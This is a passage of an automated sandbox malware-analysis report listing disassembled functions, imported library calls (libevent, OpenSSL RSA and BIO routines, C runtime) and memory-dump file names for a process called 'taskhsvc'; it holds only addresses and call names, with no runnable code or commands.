    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003EC11F, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 94
    APIs
    • abort.MSVCRT ref: 003EC173
    • event_config_new.LIBEVENT-2-0-5 ref: 003EC183
    • __stack_chk_fail.LIBSSP-0 ref: 003EC2A5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003EC1C5
    • event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1D8
    • event_config_set_num_cpus_hint.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1F5
    • event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC208
    • event_base_new_with_config.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC213
    • event_config_free.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC223
    • exit.MSVCRT ref: 003EC25C
      • Part of subcall function 003EC319: event_base_get_method.LIBEVENT-2-0-5 ref: 003EC331
      • Part of subcall function 003EC319: __stack_chk_fail.LIBSSP-0 ref: 003EC341
    • event_get_version.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC268
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855569787.003E5000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002DE4A0, Relevance: 23.7, APIs: 11, Strings: 2, Instructions: 919
    APIs
    • abort.MSVCRT ref: 002DE529
      • Part of subcall function 00334233: memset.MSVCRT ref: 00334279
      • Part of subcall function 00334233: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002DE544), ref: 0033428C
      • Part of subcall function 00322710: abort.MSVCRT ref: 00322766
      • Part of subcall function 00322710: abort.MSVCRT ref: 003227B5
      • Part of subcall function 00322710: __stack_chk_fail.LIBSSP-0 ref: 0032281B
    • abort.MSVCRT ref: 002DE5BE
    • memchr.MSVCRT ref: 002DE5EE
      • Part of subcall function 00322918: __stack_chk_fail.LIBSSP-0 ref: 0032296C
      • Part of subcall function 00322414: strlen.MSVCRT ref: 0032243C
      • Part of subcall function 00322414: memcmp.MSVCRT ref: 00322476
      • Part of subcall function 00322414: __stack_chk_fail.LIBSSP-0 ref: 00322486
      • Part of subcall function 002DE31B: __stack_chk_fail.LIBSSP-0 ref: 002DE499
    • abort.MSVCRT ref: 002DECD7
    • memchr.MSVCRT ref: 002DED07
    • __stack_chk_fail.LIBSSP-0 ref: 002DF466
      • Part of subcall function 003223BF: strlen.MSVCRT ref: 003223E1
      • Part of subcall function 003223BF: strncmp.MSVCRT ref: 003223FD
      • Part of subcall function 003223BF: __stack_chk_fail.LIBSSP-0 ref: 0032240D
    • memchr.MSVCRT ref: 002DEDAC
      • Part of subcall function 003342F8: strlen.MSVCRT ref: 0033431A
      • Part of subcall function 003342F8: __stack_chk_fail.LIBSSP-0 ref: 00334343
      • Part of subcall function 002DDDB7: __stack_chk_fail.LIBSSP-0 ref: 002DDDF1
      • Part of subcall function 0033434A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 0033434A: memcpy.MSVCRT ref: 00334405
      • Part of subcall function 0033434A: __stack_chk_fail.LIBSSP-0 ref: 00334423
      • Part of subcall function 002CF5C4: strlen.MSVCRT ref: 002CF5EC
      • Part of subcall function 002CF5C4: __stack_chk_fail.LIBSSP-0 ref: 002CF619
    • abort.MSVCRT ref: 002DEFAD
    • memchr.MSVCRT ref: 002DEFD7
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strcmp.MSVCRT ref: 002DF193
    • strcmp.MSVCRT ref: 002DF262
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 00334024
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033407F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003340C1
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333FC6: __stack_chk_fail.LIBSSP-0 ref: 0033422C
      • Part of subcall function 00331A54: memset.MSVCRT ref: 00331ADE
      • Part of subcall function 00331A54: abort.MSVCRT ref: 00331C29
      • Part of subcall function 00331A54: __stack_chk_fail.LIBSSP-0 ref: 00331C43
      • Part of subcall function 003365C1: RSA_new.LIBEAY32 ref: 003365D1
      • Part of subcall function 003365C1: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,002DF274), ref: 00336613
      • Part of subcall function 003365C1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,002DF274), ref: 0033662E
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336A9C
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336ADB
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B2E
      • Part of subcall function 00336A40: BIO_new_mem_buf.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B40
      • Part of subcall function 00336A40: RSA_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B68
      • Part of subcall function 00336A40: PEM_read_bio_RSAPrivateKey.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B8B
      • Part of subcall function 00336A40: BIO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B9E
      • Part of subcall function 00336A40: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336BD8
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 0033701F
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 0033705E
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370A0
      • Part of subcall function 00336FC3: BIO_s_mem.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370A5
      • Part of subcall function 00336FC3: BIO_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370AD
      • Part of subcall function 00336FC3: BIO_write.LIBEAY32 ref: 003370D9
      • Part of subcall function 00336FC3: RSA_free.LIBEAY32 ref: 003370F1
      • Part of subcall function 00336FC3: PEM_read_bio_RSAPublicKey.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337114
      • Part of subcall function 00336FC3: BIO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337127
      • Part of subcall function 00336FC3: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337161
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 002DDDF8: __stack_chk_fail.LIBSSP-0 ref: 002DE314
      • Part of subcall function 00322871: __stack_chk_fail.LIBSSP-0 ref: 003228C7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00270D5F, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 367
    APIs
    • abort.MSVCRT ref: 00270DCB
    • abort.MSVCRT ref: 00270E0A
      • Part of subcall function 0026D20C: __stack_chk_fail.LIBSSP-0 ref: 0026D242
    • abort.MSVCRT ref: 00270EA8
      • Part of subcall function 00273FB0: __stack_chk_fail.LIBSSP-0 ref: 00274068
      • Part of subcall function 00270C0E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270EEE), ref: 00270C6B
      • Part of subcall function 00270C0E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270EEE), ref: 00270CAA
      • Part of subcall function 00270C0E: __stack_chk_fail.LIBSSP-0 ref: 00270D58
    • abort.MSVCRT ref: 00270F7D
    • abort.MSVCRT ref: 00270FC0
    • abort.MSVCRT ref: 00271023
    • abort.MSVCRT ref: 00271066
    • abort.MSVCRT ref: 002710C9
    • abort.MSVCRT ref: 0027110C
      • Part of subcall function 0027734D: time.MSVCRT ref: 0027736A
      • Part of subcall function 0027734D: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271149), ref: 002773AC
      • Part of subcall function 0027734D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271149), ref: 002773D2
      • Part of subcall function 00277229: time.MSVCRT ref: 00277246
      • Part of subcall function 00277229: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00272A0F), ref: 00277288
      • Part of subcall function 00277229: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00272A0F), ref: 002772BA
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • __stack_chk_fail.LIBSSP-0 ref: 00271337
      • Part of subcall function 00270961: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271238), ref: 002709B8
      • Part of subcall function 00270961: memcpy.MSVCRT ref: 002709E1
      • Part of subcall function 00270961: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271238), ref: 002709F4
      • Part of subcall function 00273E8E: abort.MSVCRT ref: 00273F1D
      • Part of subcall function 00273E8E: abort.MSVCRT ref: 00273F92
      • Part of subcall function 00273E8E: __stack_chk_fail.LIBSSP-0 ref: 00273FA3
      • Part of subcall function 00272A33: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0027132B), ref: 00272A68
      • Part of subcall function 0027BECE: __stack_chk_fail.LIBSSP-0 ref: 0027BF83
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031284F, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 255
    APIs
      • Part of subcall function 00312523: strftime.MSVCRT ref: 00312608
      • Part of subcall function 00312523: __stack_chk_fail.LIBSSP-0 ref: 0031266E
    • memcpy.MSVCRT ref: 00312B34
      • Part of subcall function 003123FC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,003129BA), ref: 0031247D
      • Part of subcall function 00314F0D: strlen.MSVCRT ref: 00314FA0
      • Part of subcall function 00314F0D: strlen.MSVCRT ref: 00315010
      • Part of subcall function 00314F0D: memcpy.MSVCRT ref: 00315067
      • Part of subcall function 00314F0D: __stack_chk_fail.LIBSSP-0 ref: 00315080
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strlen.MSVCRT ref: 00312A07
    • memcpy.MSVCRT ref: 00312A46
      • Part of subcall function 00316065: __stack_chk_fail.LIBSSP-0 ref: 00316100
    • __stack_chk_fail.LIBSSP-0 ref: 00312B6F
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
    • strlen.MSVCRT ref: 00312ACE
    • memcpy.MSVCRT ref: 00312AFA
      • Part of subcall function 003F8710: strlen.MSVCRT ref: 003F872A
      • Part of subcall function 003F8710: malloc.MSVCRT ref: 003F8736
      • Part of subcall function 003F8710: strlen.MSVCRT ref: 003F8740
      • Part of subcall function 003F8710: malloc.MSVCRT ref: 003F874C
      • Part of subcall function 003F8710: free.MSVCRT ref: 003F87AC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00220663, Relevance: 16.3, APIs: 6, Strings: 3, Instructions: 544
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0021F729: abort.MSVCRT ref: 0021F776
      • Part of subcall function 0021F729: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0021F7A7,?,?,?,?,?,00206074), ref: 0021F78B
      • Part of subcall function 00315561: __stack_chk_fail.LIBSSP-0 ref: 003155CC
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • abort.MSVCRT ref: 002207B2
    • time.MSVCRT ref: 00220850
